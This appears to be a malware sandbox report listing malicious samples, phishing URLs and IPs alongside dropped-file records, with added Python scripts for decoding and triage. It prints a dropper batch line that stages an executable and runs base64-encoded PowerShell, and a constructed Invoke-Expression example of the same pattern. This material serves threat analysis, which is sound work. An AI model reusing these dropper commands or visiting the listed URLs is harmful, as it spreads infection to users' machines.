Z0m3hA5H5V.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 52.217.34.44
7C3J00l6fa.exe | Get hash | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc | Browse | 52.216.213.65
8RYB9RzQA5.exe | Get hash | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc | Browse | 52.216.60.241
tx2WEPjzLS.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, zgRAT | Browse | 52.217.75.100
https://upvir.al/153868/lp153868 | Get hash | malicious | HTMLPhisher | Browse | 3.5.6.216
GarEwUZuLO.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 52.217.137.169
Zgh9WMogTw.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT | Browse | 54.231.131.201
o7dKnIGaW3.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 52.217.10.172
https://https.secure-links.bloemlight.com/XVEdSV1YycHFWaTl0VFZCQllWaHlOekJNY1UwcmRrWnJjbEpLVUdGVVJEUXlSa3hVTWtRcmFFWTBhRVpIYlZCUFoyNDFTM1ZqY0ZZMVlsbFJTRkZFVERab00zSnZTRGw2YUdKeWMydENObVJWY3pWWEwxRmtaM05HWm5WcVl5dDZRamxGZUVKMWFtSkJSRGhPUVZFNGRsZG5hRXBqUW1ObVpVRmFOekJoUTNkU1VIVmljM05NTUVscVRrNURNMEpUTmxaTGVEVlRSRTlCYW5GRGIyYzBPU3R2V0dOdlMzRlpSMUppVm01TVEwUjNaRzVKZVhGaEswaFZha2hSVFRaSExTMURia1puVVVKWFZtcGtRMXBEUWtFeGFuZFFRbkJuUFQwPS0tZDdiYmVmNzQwNzQ2NTYyNmM0ZDNmMzEwYWYyYTZhOTVhMzU5YTQ1ZQ==?cid=1845890172 | Get hash | malicious | Unknown | Browse | 3.5.25.105
bbSC5jm8tF.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 3.5.29.236
74APa4Tj5X.exe | Get hash | malicious | Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar | Browse | 52.216.177.35
NpXHmOjKt2.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar | Browse | 16.182.42.185
X9TRynCrTi.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 54.231.168.153
12hMgY5GVz.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 54.231.136.193
JOXaGO98rW.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 3.5.25.40
ImuxbCF4JK.exe | Get hash | malicious | LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRAT | Browse | 52.217.231.217
Match: AMAZON-02US
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
VDIbCKYOlG.exe | Get hash | malicious | PayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 13.249.98.51
PARASWIFT.exe | Get hash | malicious | FormBook | Browse | 75.2.115.196
2OcriJkWk6.exe | Get hash | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT | Browse | 104.192.141.1
YX1CxTwW9j.exe | Get hash | malicious | PayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 13.249.98.107
QUuUm3J8x3.exe | Get hash | malicious | Njrat | Browse | 18.197.239.5
XAxaAbjIBy.exe | Get hash | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.53
b823dec3eeae35906a95d69d3c39ce07fe3155f2c8d4c.exe | Get hash | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.96
PO54623.exe | Get hash | malicious | AveMaria, PrivateLoader, UACMe | Browse | 3.65.73.103
417OeBepSx.exe | Get hash | malicious | PayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.53
j3sCauen5m.exe | Get hash | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.96
KincDAGGsy.exe | Get hash | malicious | PayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.96
l3OBSCwBil.exe | Get hash | malicious | PayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 52.67.144.119
FksQej1gmC.exe | Get hash | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.53
ygM026LPMk.exe | Get hash | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.53
TmFDAPheaH.exe | Get hash | malicious | PayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.53
dYdjynHexU.exe | Get hash | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.119
jCjY2PPRjw.exe | Get hash | malicious | PayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.53
BkyrjYb3HZ.exe | Get hash | malicious | RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 108.156.83.53
B9COiyrHVE.exe | Get hash | malicious | PayPal Phisher, RisePro Stealer, SmokeLoader, Vidar, zgRAT | Browse | 54.94.254.242
https://nebrina.tokyo/login | Get hash | malicious | Unknown | Browse | 54.65.124.121
Associated Sample Name / URL | Detection | Threat Name | Context
TransferiXX103XXDMT231151342.docx.doc | malicious | Unknown | 104.192.141.1
09Nueva_orden_de_compra.xlam.xlsx | malicious | Unknown | 104.192.141.1
Updationavailableformisofficetocleanofficfilesandupdationsforclearpcfromthehk.Doc.doc | malicious | Remcos | 104.192.141.1
2360.docx.doc | malicious | Unknown | 104.192.141.1
SHIPPING_DOCUMENT.xla.xlsx | malicious | Remcos | 104.192.141.1
INV_151223.xlam.xlsx | malicious | AgentTesla | 104.192.141.1
DHL))9documentos.xla.xlsx | malicious | AgentTesla | 104.192.141.1
OVERDUE_INVOICE.xlam.xlsx | malicious | Remcos, DBatLoader | 104.192.141.1
SHIPPING_DOCUMENT.xla.xlsx | malicious | Remcos | 104.192.141.1
CONTG._0992-19.doc | malicious | Remcos, DBatLoader | 104.192.141.1
Request_for_quote_(RFQ).xlam.xlsx | malicious | Unknown | 104.192.141.1
DHL09685879790890068689.xla.xlsx | malicious | AgentTesla | 104.192.141.1
https://docs.google.com/presentation/d/e/2PACX-1vSec7WEziVSiueXi_Oc5ouyTtGY3xvHsZKLt1IqKuXp8jkEd7P9v0VuDrCeWn2fqaf80wRnVvD6bkDR/pub?start=false&loop=false&delayms=3000 | malicious | HTMLPhisher | 104.192.141.1
Order_X20200703XXX20200704.xlam.xlsx | malicious | Unknown | 104.192.141.1
OrderXInquiry.xla.xlsx | malicious | Remcos | 104.192.141.1
Nuevo_orden.xla.xlsx | malicious | AgentTesla | 104.192.141.1
Euro payment copy.docx | malicious | Remcos | 104.192.141.1
Reserva_Advogados_Associados.ppam | malicious | Unknown | 104.192.141.1
Reserva.xls | malicious | RevengeRAT | 104.192.141.1
Comprovante_Reserva.xls | malicious | RevengeRAT | 104.192.141.1
                                                            No context
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):15189
                                                            Entropy (8bit):5.0277781322507495
                                                            Encrypted:false
                                                            SSDEEP:384:8WvTVoGIpN6KQkj2kkjh4iUxGhaVRvRUSdOdB0RW6c:8WLV3IpNBQkj2Nh4iUxOaVRvRUSdOdBP
                                                            MD5:5B51A2E6ADEC70D7E4DDA7F1B007D70B
                                                            SHA1:7C43795768CB4E142BAF5071E76E0A01F8D42D8B
                                                            SHA-256:C7C3F5860D346AFD7C390D9D37CF93006BFD0A9796F9EA8D8AABB058BF51BE04
                                                            SHA-512:08887452E6C23C579CAB2E8DB2C533CC0BA5FDBDEDE190A929C102FEE4137685194922398CC8B8E558C59407C8F62E5B9138B2D2B3F5BC45087254BB31503832
                                                            Malicious:false
                                                            Preview:PSMODULECACHE.....8.-./...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........Y.:j...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet...........?j...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):13312
                                                            Entropy (8bit):4.23160268880451
                                                            Encrypted:false
                                                            SSDEEP:96:Qtj5uIFU33Unp5VGemuevWeESStjTLtFjDZvlYjTb9YlNmNQkGHf9+b1vC+X0jtW:Qt/F6YqJSxtdZgemNQnIN0jWNFaz
                                                            MD5:8A85C2296BA0027A338FE589456F35C4
                                                            SHA1:C9D82C8CC486E8B51D61052DFD6FE03B82EA0FAD
                                                            SHA-256:E3600C05A7DD350D19EC1E1E4D03ED2EE9D99DAAAB9B26C38C699BC77DF8EBFF
                                                            SHA-512:314C4192635F8538541CF6B402E82211AB3E622264054E6DBCD25364980DDA15DD1D79EB5345F54B71A147DF7D88AE9258EEA9EB62522D8DBB84476B61355EAB
                                                            Malicious:false
                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:\Device\Mup\89.23.98.22\LN\GB.exe
                                                            File Type:ASCII text, with very long lines (6011), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):6078
                                                            Entropy (8bit):4.136430526920219
                                                            Encrypted:false
                                                            SSDEEP:96:hrVPq4XAF3d3EhTnEhOmohbhxNDQIVtaAPp9O6lPQkkXOyGn75or7ULZ5ViJ22t+:pVPqS43d3EhLEhOmohbhxNJBP6r7qisP
                                                            MD5:A9FE0759404CB175AFD0360B0931B33B
                                                            SHA1:45A6A60435CB89989AA1D4CA5B3EDD4FC8F86583
                                                            SHA-256:506E2708776AE85FA2DDD37B9E5B11BE5339E86DC7451758D33ED885C800A045
                                                            SHA-512:E6120FD857AA698DFC29645C1EA9808AEC6635F26DFEB4DBA4445E80A819C0DD5197EA348AC859480C388267CF8547852C3CB423D7FE71F19254C2756DF88D3A
                                                            Malicious:false
                                                            Preview:echo f | xcopy /s test2.exe "%temp%\persistent2\test2.exe" >NUL..powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('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
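The batch file above does two things: it copies test2.exe into %temp%\persistent2 with xcopy, and it hands PowerShell a base64 string that is decoded with [System.Text.Encoding]::Unicode, which is UTF-16LE rather than UTF-8. The blob itself is not reproduced in the report. The Python below is an added example and is not part of the report or of the sample: it pulls the xcopy staging paths and any FromBase64String('...') or -EncodedCommand blobs out of a batch file and decodes them as UTF-16LE, tolerating a truncated blob. The batch text and the decoded command (a Start-Process line) are constructed for the example; the real payload is unknown.

```python
import base64
import re

# Constructed sample batch file, modelled on the one GB.exe drops in the report.
# The real base64 blob is not reproduced there, so the decoded command below
# (SAMPLE_INNER_COMMAND) is made up for this example.
SAMPLE_INNER_COMMAND = 'Start-Process "$env:TEMP\\persistent2\\test2.exe" -WindowStyle Hidden'
SAMPLE_BLOB = base64.b64encode(SAMPLE_INNER_COMMAND.encode("utf-16-le")).decode("ascii")
SAMPLE_BATCH = (
    'echo f | xcopy /s test2.exe "%temp%\\persistent2\\test2.exe" >NUL\r\n'
    'powershell -Command "[System.Text.Encoding]::Unicode.GetString('
    "[System.Convert]::FromBase64String('" + SAMPLE_BLOB + "')) | Invoke-Expression\"\r\n"
)

# Inline FromBase64String('...') calls and the -e/-ec/-enc/-EncodedCommand flag family.
_B64_CALL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# xcopy [/switches ...] <source> <destination>; either operand may be quoted.
_XCOPY = re.compile(r'\bxcopy\b(?:\s+/\S+)*\s+("[^"]+"|\S+)\s+("[^"]+"|\S+)', re.I)


def decode_unicode_b64(blob):
    """[Text.Encoding]::Unicode means UTF-16LE; decoding as UTF-8 gives NUL-riddled junk."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def summarize_dropper(batch_text):
    """Recover where the dropper stages files and what its encoded PowerShell does."""
    copies = [(src.strip('"'), dst.strip('"')) for src, dst in _XCOPY.findall(batch_text)]
    decoded = []
    for blob in _B64_CALL.findall(batch_text) + _ENC_FLAG.findall(batch_text):
        try:
            decoded.append(decode_unicode_b64(blob))
        except (ValueError, UnicodeDecodeError):
            decoded.append(None)  # truncated or garbled blob: keep the slot so it is noticed
    return {"copies": copies, "decoded_commands": decoded}


if __name__ == "__main__":
    for key, value in summarize_dropper(SAMPLE_BATCH).items():
        print(key, value)
```

A blob that fails validation or decodes to an odd number of bytes is reported as None rather than raised, so a preview cut off mid-string (as in the report) still yields the staging paths.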
                                                            Process:\Device\Mup\89.23.98.22\LN\GB.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):176128
                                                            Entropy (8bit):6.388398008506947
                                                            Encrypted:false
                                                            SSDEEP:3072:kMobR7ezAjLOZvmX165GWp1icKAArDZz4N9GhbkrNEk1Bvz5:heR7eammGp0yN90QEc7
                                                            MD5:6C704BAE1033920B576DACBCFF6BFEF5
                                                            SHA1:A2B031CADB67B7F9BAE7D550E411D0412DAE538B
                                                            SHA-256:7C3476FD586BCB7F42E706F32999356FB4B2C8341F00B8297CF74131F6FA611C
                                                            SHA-512:B630F2ABA087E00983FEE09021A892D48A171354D8218D8F7B5B4AFF6CB2F933FC1286D69684CE689F1859174A55EC583536AAFEAB090BE9C14B7A5229050A98
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 11%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._.............".......... ......P..........@..........................................`.......... ..........................................................D...............0...x...T...............................@...........P... ............................text....~.......................... ..`.rdata.. $.......0..................@..@.data...............................@....pdata..D...........................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\xcopy.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):176128
                                                            Entropy (8bit):6.388398008506947
                                                            Encrypted:false
                                                            SSDEEP:3072:kMobR7ezAjLOZvmX165GWp1icKAArDZz4N9GhbkrNEk1Bvz5:heR7eammGp0yN90QEc7
                                                            MD5:6C704BAE1033920B576DACBCFF6BFEF5
                                                            SHA1:A2B031CADB67B7F9BAE7D550E411D0412DAE538B
                                                            SHA-256:7C3476FD586BCB7F42E706F32999356FB4B2C8341F00B8297CF74131F6FA611C
                                                            SHA-512:B630F2ABA087E00983FEE09021A892D48A171354D8218D8F7B5B4AFF6CB2F933FC1286D69684CE689F1859174A55EC583536AAFEAB090BE9C14B7A5229050A98
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 11%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._.............".......... ......P..........@..........................................`.......... ..........................................................D...............0...x...T...............................@...........P... ............................text....~.......................... ..`.rdata.. $.......0..................@..@.data...............................@....pdata..D...........................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................................................
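The PE written by \Device\Mup\89.23.98.22\LN\GB.exe and the one written by xcopy.exe carry identical hashes (MD5 6C704BAE..., SHA-256 ending 6FA611C), which is the xcopy staging step from the batch file: GB.exe drops test2.exe, xcopy copies it into %temp%\persistent2. GB.exe itself runs from a remote SMB share, since \Device\Mup\<host>\<share> is the kernel form of a \\host\share UNC path. The Python below is an added example, not part of the report: it parses the flattened Process / SHA-256 / Malicious records of this dropped-file listing and flags writers that execute from a remote share and hashes written by more than one process. The embedded excerpt is three of the records above reduced to the fields the script reads; the record layout is unchanged.

```python
import re
from collections import defaultdict

# Constructed excerpt: three dropped-file records from the report, reduced to the
# fields this script needs (values copied from the report, layout unchanged).
REPORT_EXCERPT = """\
Process:\\Device\\Mup\\89.23.98.22\\LN\\GB.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):176128
SHA-256:7C3476FD586BCB7F42E706F32999356FB4B2C8341F00B8297CF74131F6FA611C
Malicious:true
Process:C:\\Windows\\System32\\xcopy.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):176128
SHA-256:7C3476FD586BCB7F42E706F32999356FB4B2C8341F00B8297CF74131F6FA611C
Malicious:true
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Malicious:false
"""

# \Device\Mup\<host>\<share>\... is the kernel spelling of \\<host>\<share>\...;
# a process image at either path was loaded over SMB from <host>.
_REMOTE = re.compile(r"^(?:\\Device\\Mup|\\)\\([^\\]+)\\([^\\]+)", re.I)


def parse_records(text):
    """Split the flattened key:value listing into one dict per dropped file."""
    records, current = [], None
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)   # split once: values hold drive letters
        key, value = key.strip(), value.strip()
        if key == "Process":              # every record starts with its writer
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def remote_share_origin(path):
    """Return (host, share) when path is a UNC or MUP path, else None."""
    m = _REMOTE.match(path)
    return (m.group(1), m.group(2)) if m else None


def triage(records):
    by_hash = defaultdict(set)
    for r in records:
        by_hash[r.get("SHA-256", "")].add(r.get("Process", ""))
    return {
        "remote_share_processes": sorted(
            {r["Process"] for r in records if remote_share_origin(r["Process"])}),
        # same bytes written by two different processes: a staging/persistence copy
        "staged_copies": {h: sorted(p) for h, p in by_hash.items() if len(p) > 1},
        "malicious": sorted({r["SHA-256"] for r in records
                             if r.get("Malicious", "").lower() == "true"}),
    }


if __name__ == "__main__":
    for key, value in triage(parse_records(REPORT_EXCERPT)).items():
        print(key, value)
```

Pointing the same script at the full listing turns the repeated 1-byte "1" files and the duplicated 176128-byte PE into two findings instead of a dozen near-identical records to read by hand; the remote_share_processes entry is the one to pivot on for SMB egress in proxy or firewall logs.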
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):4.221882728322711
                                                            Encrypted:false
                                                            SSDEEP:384:iIEoh9k3T2jljz2Sm+ytVa5XX0j+GIt2t9DgJTpVeYJZ//E:Er3T2NFyMH3k0JTpoUE
                                                            MD5:025A9FAEEE4DCECA75808DD82D1141F0
                                                            SHA1:28B6742038FAB4F6980CC7FC822DD322378DDD45
                                                            SHA-256:49A2E8F13C02C912092750D2FA4EA887B35C7A3D307DAED7E91FE01FD00F7F7F
                                                            SHA-512:6B9F4BC509F885124E083F7D2C93CC779DD255B412625CAD7ED617F0AFDC3112A08F530CA0271E127032161AA01FF5E0B9CEA4DA22EC68101CD2033B7F57E5C7
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................2...........................................................................................4...........%........... ...!..."...#...$.......&...'...(...)...*...+...,...-......./...0...1...3.......5.......6...7...8...9...:...;...<...=...>...................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Thu Dec 21 07:50:09 2023, length=689664, window=hide
                                                            Category:dropped
                                                            Size (bytes):1004
                                                            Entropy (8bit):4.479989789727464
                                                            Encrypted:false
                                                            SSDEEP:12:8snRgXg/XAlCPCHaXJyB3XB/Dr8xX+WUcZ9OmpCGicvbdfqpCEDtZ3YilMMEpxR7:8+/XTwdxOacrvWepq7Dv3qXqk7N
                                                            MD5:96E864385EAA5BFE47B7B10FB46602E5
                                                            SHA1:F0C0471B75EBACCA8C355741CAFE3160C6F67E9F
                                                            SHA-256:287B92383BE2A80882DFE2813DBEF69187FD0531E8BC7732839FEBCC58819A18
                                                            SHA-512:E04AFEDC9FF24B98E0401F254864DC8FF5F78B21E410B92AB61ADBE7A09FBEB2B35B75AD02E69CD899C10925A0DA229C6905F61A1C96CB097EA88F5C9B1BED31
                                                            Malicious:false
                                                            Preview:L..................F.... ...@...r...@...r...x...3...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......WC...user.8......QK.X.WC.*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2......WEF .42#U0430.doc..F.......WC..WC.*.........................4.2.#.U.0.4.3.0...d.o.c.......v...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\42#U0430.doc.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.2.#.U.0.4.3.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8...8.....[
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Generic INItialization configuration [folders]
                                                            Category:dropped
                                                            Size (bytes):50
                                                            Entropy (8bit):4.333660689688185
                                                            Encrypted:false
                                                            SSDEEP:3:M1R2Alm44tAlv:Ml
                                                            MD5:3338E78048A847340BD94C90F8A85740
                                                            SHA1:6E209EF21EFDA76EA7F89FB62F6E176F5F9722C2
                                                            SHA-256:BC15E1BA6BBA9D8228903A09F3A25F2286047F0DFA420E79F778A8889334471D
                                                            SHA-512:02FB038E17B28417D801D1E51389F0E1687B7FA1DE443A96E20862CCBEDCAA62C9BA15D886C9BCB959196B018A0035E27C51FD1C24DDE00E94A6298710008A02
                                                            Malicious:false
                                                            Preview:[doc]..42#U0430.LNK=0..[folders]..42#U0430.LNK=0..
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
